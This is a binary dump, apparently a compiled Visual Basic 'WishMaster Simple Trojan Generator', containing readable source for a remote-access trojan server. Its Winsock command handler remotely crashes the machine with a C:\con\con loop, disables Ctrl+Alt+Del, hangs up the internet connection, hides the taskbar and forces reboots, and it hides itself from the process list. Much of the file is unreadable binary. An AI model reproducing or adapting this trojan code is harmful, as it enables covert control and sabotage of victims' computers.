?.MKBʶ:r>S}.*li/|*H߁YRx89q6sY."2Ha!O0dttΈlר=Vu8n*TMCo[6Uxkd֐)ؖ$TEF1bZ0R(ȩ#xb)OJBY?5Z%/~tU{&grqOG!<ʞI§EMsL֥aGY z?J3F=HQ &ˊ`߭H#yV2 WqN¬(S͝QBx nG9%yL'YR:aJbÌR|dj@ÑI.gwsvF]Ϯk1 5vT,wCcïvwUFEejڍ¯5^m#Q3-S:*P*UUEԌw/4rN+-<*3wcI&ܪZc~Q'8rORj<*;t5W']9b'.u#4L{yJ2;֩#'&$OOEEhE dŏNK[-͌%?{{Tݍ\8yGj:&svkFRh6VzLhzЦD?ZpOAV@4ߔU; U5R_:SXFu{[a`ԉoJ()B'/iqIW!jyh;}T 7"j$jD]9OLҵtn7JRZ-[C[ TBMV}ڸnۻ=UfUN}yc$:w BͻQfOl֜xyv3F)pO,}W6MTDZFhSb)֐#8[?hO!cNX9i?ZQhFw?(?/E={L&"ku3Kd1,#EYi7ړ=Vt~͚Ӯ eIѾ05NxSOZӨRG4o_ִn -1Y#!9"y FI #ZWh9]W憅ٚ#Ղ@8'sA֍qk;ߍЁ)t䙟L7eMm)N9RQlY9[Ѓs7ҷ91nԝxTcuvCYZ%22ں!1MKTcg 1( 938U#?wjUґr8⫙dAd(){[[lS<:^DԍJ:fߡQl}ڈކm#'KʚfR(nʶV%Q+s=b4c}{TFW")z\XH<*WRrAؑ;?d@u*XXKo*X(~z[ZXih?#6x{{Ŀ\UYY/ҽ-Kg+THsi8-Ոs5g'<с'$WOR@E+r]ti9\N{y\Vl ly֧*"D*Nx5b)dySG}(V*fs|%leTGƴG\5-}r5%eN-do>*!7Χ+cV]͉go-[ֈY:QIfⶲܧjF}A-rνsOf237ϵtIbpR6m=Q}L.;WRm 1Ts ICstZPzfWfن-=j0:dG_V8U[.d3RydJTӸE/WWXZ]vWOcFsZe iS6?j̿AZ[Sco [$YZN~tYhZx1Kzt)>Ui3tia<}ƞ442` yEi~1k7M+O&b%|S00ZF+4jzS.니$n gODI6vkIdmR޼T a9 @r#ڲmc!%n@>Z'%̌.Y[hGf%܇jŻ'8=3^I/~Х $޻+0j9pXEL-JI8֕ZT^oATST?%@{jߘE7=g_hƫݯ>ާ"%eN޼Ry=i#G v?kQ)rY?{,K}U?A?kytiJ6$L"iy?:zJEӶ%;/.#V'O@H(+]FUG8s=YZu'on}1-r=7ݶeե_C(ץ(]wH&Ov˕jF=S< Tڗ??R"ᇚWQY[~LLSe 3keI\_jbbFS ї%>@<@MgQǕƖVn%ӎlIsj]i*qWJnNhҐOJpl]7T{D3 퓒+(RvLFBqRVeҜ+3SZQ؀Wͮܟ4 r{p+Q:ҽOX=M_Z+o./֥ح )2"<t*s2yy`p40w] LҞj87>Vғ8p b'7ABNԵ-XTig >ߕH'[4cԽo̍ M$#rnc44ݲ88>I.QjV0S?ƱwGu7AK&:j.?}£4ayT8YsUn|gjc:TZX-uRT8S!8񪴙=(?d2D9 <ehR8`p:qY"Ì󦛒o旲oqD-9byCUkp1jbS'}ִJK9ӖpMX8SUKek8s(ʥkH9 ZQS2iaE8L"%' qJ9XZO/=**dQaU9teZn0:> uiبTJP3)#i@OROe=EYZ~RXJ m~Зei$U%O2zPjϔdʞ!Vq '2\҄®I݈ғV9̃2WF|^ɟ +%MnuSair&ExitGw539& SalvarTrojan &Make Trojanxw42/' NextCommand&NextP Gw30%(Frame14/4xXO /)opencd Open/Close CD!.* textoPorta8g 65535 %6+ taskbaronoffTaskbar On/Offp3, closeserver Close Servers:-LabelFileManager File Manager7 8. LabelFuckbootFuck Boot Filess-/ LabelRebootReboot00 LabelBeep Beep On/Offp,1 labelLockupCrashp@2 LabelctrlEnable/Disable CTRL+ALT+DELp B3 CheckhangupHang up internet connectionp# 94 taskhideshowShow/Hide Taskbarpp;5LabelRemoveServerRemove Server p56LabelTrojanPort Trojan Port:W"/7Label9Welcome!(h#p8 txthangup IIf textreceived = "HangUp" Then Call HangUp textreceived = "" End If 9txttaskhideshowh If textreceived = "Hidetaskbar" Then hwnd1 = FindWindow("Shell_traywnd", "") Call SetWindowPos(hwnd1, 0, 0, 0, 0, 0, SWP_HIDEWINDOW) SM "The taskbar is invisible" + vbCrLf End If If textreceived = "ShowTaskbar" Then hwnd1 = FindWindow("Shell_traywnd", "") Call SetWindowPos(hwnd1, 0, 0, 0, 0, 0, SWP_HIDEWINDOW) Call SetWindowPos(hwnd1, 0, 0, 0, 0, 0, SWP_SHOWWINDOW) SM "Taskbar visible again..." + vbCrLf textreceived = "" End If :txtcrash If textreceived = "crash" Then Do Y = Shell("C:\con\con", vbNormalFocus) x = Shell("c:\windows\notepad.exe", vbMinimizedFocus) Loop End If ;txtcloseserver  gIf textreceived = "closeserver" Then SM "Closing Server..." + vbCrLf textreceived = "" End End If N7<basP_  -7Declare Function GetVersionEx Lib "Kernel32" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function OpenProcess Lib "Kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Public Declare Function RegisterServiceProcess Lib "kernel32.dll" (ByVal dwProcessId As Long, ByVal dwType As Long) As Long Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Integer, ByVal aBOOL As Integer) As Integer Public Declare Function IsWindowEnabled Lib "user32" (ByVal hwnd As Integer) As Integer Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Declare Function RasEnumConnections Lib "RasApi32.dll" Alias "RasEnumConnectionsA" (lpRasConn As Any, lpcb As Long, lpcConnections As Long) As Long Declare Function RasHangUp Lib "RasApi32.dll" Alias "RasHangUpA" (ByVal hRasConn As Long) As Long Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Public Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, ByVal lpSecurityAttributes As Long, phkResult As Long, lpdwDisposition As Long) As Long Public Declare Function RegOpenKey Lib "advapi32.dll" Alias " RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long Public Declare Function RegQueryValueExString Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long Public Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As Long) As Long Public Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long, lpcbData As Long) As Long Public Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long Public Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long Global Const EWX_REBOOT = 2 Public Const ANYSIZE_ARRAY = 1 Type LARGE_INTEGER lowpart As Long highpart As Long End Type Type LUID_AND_ATTRIBUTES pLuid As LARGE_INTEGER Attributes As Long End Type Type TOKEN_PRIVILEGES PrivilegeCount As Long Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES End Type Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LARGE_INTEGER) As Long Declare Function GetCurrentProcess Lib "Kernel32" () As Long Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long Public Const REG_SZ As Long = 1 Public Const REG_BINARY As Long = 3 Public Const REG_DWORD As Long = 4 Public Const HKEY_CLASSES_ROOT = &H80000000 Public Const HKEY_CURRENT_USER = &H80000001 'Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const RAS_MAXENTRYNAME As Integer = 256 Public Const RAS_MAXDEVICETYPE As Integer = 16 Public Const RAS_MAXDEVICENAME As Integer = 128 Public Const RAS_RASCONNSIZE As Integer = 412 Public Type RasEntryName dwSize As Long szEntryName(RAS_MAXENTRYNAME) As Byte End Type Public Type RasConn dwSize As Long hRasConn As Long szEntryName(RAS_MAXENTRYNAME) As Byte szDeviceType(RAS_MAXDEVICETYPE) As Byte szDeviceName(RAS_MAXDEVICENAME) As Byte End Type Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 End Type Global cSystemDiretorio As String Global cBuffer As String * 255 Global xAnswer As String Public Declare Function CopyFile Lib "Kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long Public Declare Function RegMSWINSCK Lib "MSWINSCK.OCX" Alias "DllRegisterServer" () As Long 'Declare Function RasEnumConnections Lib "RasApi32.dll" Alias "RasEnumConnectionsA" (lpRasConn As Any, lpcb As Long, lpcConnections As Long) As Long Declare Function RasGetConnectStatus Lib "RasApi32.dll" Alias "RasGetConnectStatusA" (ByVal hRasCon As Long, lpStatus As Any) As Long 'Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Const RAS95_MaxEntryName = 256 Const RAS95_MaxDeviceType = 16 Const RAS95_MaxDeviceName = 32 Private Type RASCONN95 dwSize As Long hRasCon As Long szEntryName(RAS95_MaxEntryName) As Byte szDeviceType(RAS95_MaxDeviceType) As Byte szDeviceName(RAS95_MaxDeviceName) As Byte End Type Private Type RASCONNSTATUS95 dwSize As Long RasConnState As Long dwError As Long szDeviceType(RAS95_MaxDeviceType) As Byte szDeviceName(RAS95_MaxDeviceName) As Byte End Type Global cDiretorioWindows As String Global cDiretorioSystem As String Global cAppDirectory As String Global ccomputer As String Public Sub HangUp() Dim lpRasConn(255) As RasConn Dim lpcb As Long Dim lpcConnections As Long Dim hRasConn As Long Dim nLoop As Long lpRasConn(0).dwSize = RAS_RASCONNSIZE lpcb = RAS_MAXENTRYNAME * lpRasConn(0).dwSize lpcConnections = 0 ReturnCode = RasEnumConnections(lpRasConn(0), lpcb, lpcConnections) If ReturnCode = ERROR_SUCCESS Then For nLoop = 0 To lpcConnections - 1 If Trim(ByteToString(lpRasConn(nLoop).szEntryName)) = Trim(gstrISPName) Then hRasConn = lpRasConn(nLoop).hRasConn ReturnCode = RasHangUp(ByVal hRasConn) End If Next End If End Sub Public Function ByteToString(bytString() As Byte) As String Dim nLoop As Integer ByteToString = "" nLoop = 0 While bytString(nLoop) = 0& ByteToString = ByteToString & Chr(bytString(nLoop)) nLoop = nLoop + 1 Wend End Function Sub Main() cAppDirectory = App.Path If Right(cAppDirectory, 1) <> "\" Then cAppDirectory = cAppDirectory + "\" End If If App.PrevInstance Then End End If lWindowsNT = False xAnswer = VersaoWindows() If Not lWindowsNT Then xAnswer = RegisterServiceProcess(0, 1) End If xAnswer = GetSystemDirectory(cBuffer, Len(cBuffer)) cDiretorioSystem = Left(cBuffer, xAnswer) xAnswer = GetWindowsDirectory(cBuffer, Len(cBuffer)) cDiretorioWindows = Left(cBuffer, xAnswer) If Right(cDiretorioSystem, 1) <> "\" Then cDiretorioSystem = cDiretorioSystem + "\" End If If Right(cDiretorioWindows, 1) <> "\" Then cDiretorioWindows = cDiretorioWindows + "\" End If End Sub Public Function RemoveChr0(cString As String) While Right(cString, 1) = Chr$(0) cString = Left(cString, Len(cString) - 1) Wend RemoveChr0 = cString End Function Public Sub SetKeyValue(ByVal hKey As Long, sKeyName As String, sValueName As String, vValueSetting As Variant, lValueType As Long) Dim lRetVal As Long lRetVal = RegOpenKeyEx(hKey, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting) RegCloseKey (hKey) End Sub Public Function QueryValue(ByVal hKey As Long, sKeyName As String, sValueName As String) As String Dim lRetVal As Long Dim vValue As Variant lRetVal = RegOpenKeyEx(hKey, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = QueryValueEx(hKey, sValueName, vValue) QueryValue = vValue RegCloseKey (hKey) End Function Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As Long, vValue As Variant) As Long Dim lValue As Long Dim sValue As String Select Case lType Case REG_SZ sValue = vValue & Chr$(0) SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue, Len(sValue)) Case REG_DWORD lValue = vValue SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4) End Select End Function Public Sub CreateNewKey(sNewKeyName As String, lPredefinedKey As Long) Dim hNewKey As Long Dim lRetVal As Long lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal) RegCloseKey (hNewKey) End Sub Public Function VersaoWindows() As String Dim myOS As OSVERSIONINFO Dim cSystem As String Dim lResult As Long myOS.dwOSVersionInfoSize = Len(myOS) lResult = GetVersionEx(myOS) lWindowsNT = False If myOS.dwPlatformId = VER_PLATFORM_WIN32_NT Then cSystem = "Windows NT " lWindowsNT = True ElseIf myOS.dwPlatformId = VER_PLATFORM_WIN32_WINDOWS Then cSystem = "Windows 95/98 " ElseIf myOS.dwPlatformId = VER_PLATFORM_WIN32s Then cSystem = "Win32s " Else cSystem = "Indefinido " End If VersaoWindows = cSystem & _ myOS.dwMajorVersion & "." & _ myOS.dwMinorVersion & " " & _ Trim(myOS.dwBuildNumber) & " " & _ Trim(RemoveChr0(myOS.szCSDVersion)) End Function Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, vValue As Variant) As Long On Error GoTo QueryValueExError Dim cch As Long Dim lrc As Long Dim lType As Long Dim lValue As Long Dim nLoop As Long Dim sValue As String Dim sBinaryString As String lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch) If lrc <> ERROR_NONE Then Error 5 Select Case lType Case REG_SZ: sValue = String(cch, 0) lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch) If lrc = ERROR_NONE Then vValue = Left$(sValue, cch - 1) Else vValue = Empty End If Case REG_BINARY sValue = String(cch, 0) lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch) If lrc = ERROR_NONE Then vValue = sValue Else vValue = Empty End If sBinaryString = "" For nLoop = 1 To Len(sValue) sBinaryString = sBinaryString & Format$(Hex(Asc(Mid$(vValue, nLoop, 1))), "00") & " " Next vValue = sBinaryString Case REG_DWORD: lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch) If lrc = ERROR_NONE Then vValue = lValue Case Else lrc = -1 End Select QueryValueExExit: QueryValueEx = lrc Exit Function QueryValueExError: Resume QueryValueExExit End Function Public Function RebootSystem() As Boolean Dim hToken As Long Dim lAnswer As Long Dim tkp As TOKEN_PRIVILEGES Dim tkpOld As TOKEN_PRIVILEGES Dim fOkReboot As Boolean If lWindowsNT Then If OpenProcessToken(GetCurrentProcess(), _ TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) Then lAnswer = LookupPrivilegeValue(vbNullString, "SeShutdownPrivilege", tkp.Privileges(0).pLuid) tkp.PrivilegeCount = 1 tkp.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED fOkReboot = AdjustTokenPrivileges(hToken, 0, tkp, LenB(tkpOld), tkpOld, lAnswer) End If Else fOkReboot = True End If If fOkReboot Then RebootSystem = (ExitWindowsEx(EWX_REBOOT, 0) <> 0) End If End Function Public Function InternetConnected() As Boolean Dim TRasCon(255) As RASCONN95 Dim lg As Long Dim lpcon As Long Dim Tstatus As RASCONNSTATUS95 TRasCon(0).dwSize = 412 lg = 256 * TRasCon(0).dwSize If RasEnumConnections(TRasCon(0), lg, lpcon) = 0 Then Tstatus.dwSize = 160 RasGetConnectStatus TRasCon(0).hRasCon, Tstatus InternetConnected = (Tstatus.RasConnState = &H2000) End If End Function  =FirstDeclarationh Private Declare Function SystemParametersInfo Lib _ "user32" Alias "SystemParametersInfoA" (ByVal uAction _ As Long, ByVal uParam As Long, ByVal lpvParam As Any, _ ByVal fuWinIni As Long) As Long Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _ (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _ ByVal lParam As Long) As Long Private Const WM_SYSCOMMAND = &H112& Private Const SC_SCREENSAVE = &HF140& Const EWX_LogOff As Long = 0 Private Declare Function SetWindowPos Lib "user32" (ByVal _ hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As _ Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As _ Long, ByVal wFlags As Long) As Long Private Declare Function FindWindow Lib "user32" Alias _ "FindWindowA" (ByVal lpClassName As String, ByVal _ lpWindowName As String) As Long Dim hwnd1 As Long Const SWP_HIDEWINDOW = &H80 Const SWP_SHOWWINDOW = &H40  M>textctrl( 'If textreceived = "DisableCtrlAltDel" Then Call DisableCtrlAltDelete(True) SM "CtrlAltDel was disabled " textreceived = "" End If If textreceived = "EnablCtrlAltDel" Then Call EnableCtrlAltDelete(True) SM "Ctrl Alt Del is enabled again " textreceived = "" End If  ?textbeep( If textreceived = "Beepon" Then Timer1.Enabled = True SM "The computer is beeping" textreceived = "" 'Comea outro comando End If If textreceived = "Beepoff" Then Timer1.Enabled = False SM "Beeping stopped" textreceived = "" End If   @ TextoForm@ xW VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Begin VB.Form Form1 Caption = "Form1" ClientHeight = 2070 ClientLeft = 60 ClientTop = 345 ClientWidth = 3135 LinkTopic = "Form1" ScaleHeight = 2070 ScaleWidth = 3135 StartUpPosition = 3 'Windows Default Begin VB.TextBox TextUIN Height = 285 Left = 1680 TabIndex = 4 Top = 1560 Width = 735 End Begin VB.DriveListBox Drive Height = 315 Left = 900 TabIndex = 3 Top = 600 Width = 270 End Begin VB.DirListBox Dir Height = 315 Left = 600 TabIndex = 2 Top = 600 Width = 255 End Begin VB.FileListBox File Height = 870 Left = 600 TabIndex = 1 Top = 960 Width = 825 End Begin VB.Timer Timer1 Interval = 100 Left = 0 Top = 120 End Begin VB.TextBox textreceived Height = 315 Left = 600 TabIndex = 0 Top = 120 Width = 1395 End Begin MSWinsockLib.Winsock Winsock1 Left = 2520 Top = 120 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin MSWinsockLib.Winsock SockTransfer Index = 0 Left = 2520 Top = 1080 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin MSWinsockLib.Winsock sock Index = 0 Left = 2520 Top = 600 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin MSWinsockLib.Winsock SockPager Left = 2520 Top = 1560 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False  U CommonDialog3MSComDlg.CommonDialog-LB d!C4OO< A Trojan.vbp9(:"V CommonDialog2MSComDlg.CommonDialog-LB f!C4OO< A Funcoes.bas9H:"'Avbp(x Type=Exe Form=Form1.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\SYSTEM\STDOLE2.TLB#OLE Automation Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX Module=Module1; Funcoes.bas Module=Geral; Geral.bas IconForm="Form1" Startup="Form1" ExeName32="Trojan.exe" Path32="..\..\..\..\.." Command32="" Name="Project1" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 VersionCompanyName="legal" CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 Bfuncsm gPublic Sub SM(szMsg As String) On Error Resume Next Winsock1.SendData szMsg End Sub Private Sub EnableCtrlAltDelete(bEnabled As Boolean) Dim x As Long x = SystemParametersInfo(97, bDisabled, CStr(1), 0) End Sub Private Sub DisableCtrlAltDelete(bDisabled As Boolean) Dim x As Long x = SystemParametersInfo(97, bDisabled, CStr(1), 0) End Sub {CCDROM ( XIf textreceived = "Open CD" Then retvalue = mciSendString("set CDaudio door open", returnstring, 127, 0) SM "Open ABRIR CD-ROM " + vbCrLf textreceived = "" End If If textreceived = "CloseCD" Then retvalue = mciSendString("set CDaudio door closed", returnstring, 127, 0) SM "Close FECHAR CD-ROM " + vbCrLf textreceived = "" End If W CommonDialog1MSComDlg.CommonDialog-LB b!C4OO< A Form1.frm9h:"D DataArrival(; Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim stBuffer1 As String Winsock1.GetData stBuffer1, vbString textreceived = "" textreceived = stBuffer1 End Sub 'ELabel6FuncoeshW<FLabel5www.hostcontrol.cjb.netH$GLabel4Url:w)HLabel3 Contact: xg>ILabel2hostcontrol@flashmail.comHgJLabel1"WishMaster Simple Trojan Generator xx%X MS Sans SerifXAAP)Pr+N!@LVB5!*~ l4A~002A$3A@xTrojanGeneratorTrojanGeneratorProject1H8H%;<+/I<+/I90~uM_)Pr_)PrF_)Pr_)Pr` W 28C4C820-401A-101B-A3C9-08002B2F49FBCOMDLG32.OCXMSComDlg.CommonDialogCommonDialog6AAA( Ad@*\AC:\WIN\Desktop\Backup\Projetos\Visual Basic\Trojan Generator1\Trojan Generator.vbp(2A$A`}AA)Pr 6A\7A NAReDim cTamanhoUP(5000) As Long BReDim cArquivoUP(5000) As String @ReDim cRecebido(5000) As String " 'RotinasInternas4Private Sub Timer1_Timer()hxAnswer = GetSystemDirectory(cBuffer, Len(cBuffer)) TcSystemDiretorio = Left(cBuffer, xAnswer) @' Aguarda conexo a internet... BDo While Not InternetConnected() DoEvents Loop R' Envia mensagens para ICQ de conexo... 8Private Sub Winsock1_Close()~Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)dIf Winsock1.State <> sckClosed Then Winsock1.Close2Winsock1.Accept requestIDWinsock1.Closefiltro = 0 End IfBeepPrivate Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)Dim filtro4If Err.Number = 10048 ThenBPrivate Sub textreceived_Change()N3f `ӓ06A }A6AA PAi_OA7APAPAPAKPA hl\AA[]@@F@L@R@$A|>A>A>A$?A`?A?A?A@AH@AP@Ax@A@A@A@A̢AHAA8AAAAdAAX@AAANAp7A^@BA$BA]A`]P8A>@@7A;<^A`]\8A;@D7A:^A`]l8A:@H7A9,_A`]x8A9@L7A8_A`]8A8@P7A`A`]8A@T7A`A`]8A@X7A aA`]8A@\7AaA`]8A@`7A aA`]8A @d7A<tbA`]8A<@h7AbA`]8A@l7AAdcA`]8AA@p7AcA`]8A@t8A'TdA `] 9A'@x8A&dA `]9A&@|8A" eA `](9A"@49AheA0`]D9A@L9A6eA@`]\9A6@8A%\fA `]l9A%@t9AfAP`]9A@L9AgA@`]9A@L9A|gA@`]9A@L9AgA@`]9A@L9AtpfXT!PP 2phT)xlP5X!xx \0xTNA,x$ ,tphTxlPXlCh.lh 1hlhJRf Jc\(<kf  #8 pd/85lp )xpt!Pxx lt?@/tx!xpQp[x )xpA t!txx d!4pp `!thh ldl`*#\Blt*#l@2 tld`\)xphC D E F t!xx ltG@/txH I J K L M N O P Q R S T U V W "   !pQp[x )xp X F t!xx ltG@/txH "  Y F Z [ "  !pQp[x )xp \ ] F ^ _ ` a "  b c " d &!xx k&xs!pQp[x )xp&!xx k&x!pQp[x )xp&!xx k&x!pQp[x )xp&!xx k&x-!pQp[x )xp&!xx k&xk!pQp[x )xp&!xx k&x!pQp[x )xp&!xx k&x!pQp[x )xp&!xx k&xe &!xx k&xR!ppQp[x )xp&!xx k&x!lpQp[x )xp&!xx k&x!hpQp[x )xpt!Pxx lt?@/tx!dpQp[x )xp" !(pQp[x )xp=:H#%!Pxx,x!Pxxx!Pxxa(`#t=/tx5(!Pxxa(`#t]/tx5(t!xx lt /tx=:H#%!Hxx,x!Hxxx!Hxxa(`#t=/tx5(w !Hxxa(`#t]/tx5(t!@xx lt /tx=:H$%!Lxx,x!Lxxx!Lxxa(`#t=/tx5( !Lxxa(`#t]/tx5(t!xx lt /tx=fNAh$ (4 tld`\xphX(̞̗Sw 4Jf;dMSVBVM60.DLLMethCallEngineEVENT_SINK_AddRefEVENT_SINK_ReleaseEVENT_SINK_QueryInterface__vbaExceptHandler;X@(;p;;1u; ;;D4HD4VS_VERSION_INFODVarFileInfo$Translation StringFileInfo040904B0, CompanyNamelegal@ ProductNameTrojanGenerator4FileVersion1.00.00018ProductVersion1.00.0001@ InternalNameTrojanGeneratorP(OriginalFilenameTrojanGenerator.exe 1u( @ʦf3f3̙f3fffff3ff333f3333f3ff3f3̙f3fffff3ff333f3333f3f3̙̙̙f̙3̙̙̙f3fffff3ff333f3333f3fffff3fffffff3fff̙ffff3fffffffffff3ffff3f3f3ff3f33f3ffffff3ff333f3333333f33333̙33f3333f3f3f3ff33f3f3333333f3333333333f3333f3f3̙f3ffffff3f333f3333f3wUD"wUD"UUUwwwwwwDDD"""wUD"Ẻeᐐ:eᐐe::숳e2ᴐᴐeᴐe22e:ᴐeᳳeeeeᐐeᳳeᐐeᐐeeᐐeẺeeeᳺeeᳺeᐐᐴeᐐeᐐee55eeeee:eeᐈᐐᐐeᐐeeeI?? [